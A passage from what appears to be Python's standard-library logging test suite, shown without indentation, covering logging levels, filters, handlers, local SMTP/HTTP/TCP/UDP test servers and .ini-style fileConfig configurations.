self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0:
# Child process
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else:
# Parent process
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
support.wait_process(pid, exitcode=0)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self._quit = False
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
while not self._quit:
asyncore.loop(poll_interval, map=self._map, count=1)
def stop(self):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
"""
self._quit = True
support.join_thread(self._thread)
self._thread = None
self.close()
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self):
"""
Tell the server thread to stop, and wait for it to do so.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever
TIMEOUT = support.LONG_TIMEOUT
def test_basic(self):
sockmap = {}
server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (socket_helper.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
def test_race_between_set_target_and_flush(self):
class MockRaceConditionHandler:
def __init__(self, mem_hdlr):
self.mem_hdlr = mem_hdlr
self.threads = []
def removeTarget(self):
self.mem_hdlr.setTarget(None)
def handle(self, msg):
thread = threading.Thread(target=self.removeTarget)
self.threads.append(thread)
thread.start()
target = MockRaceConditionHandler(self.mem_hdlr)
try:
self.mem_hdlr.setTarget(target)
for _ in range(10):
time.sleep(0.005)
self.mem_logger.info("not flushed")
self.mem_logger.warning("flushed")
finally:
for thread in target.threads:
support.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
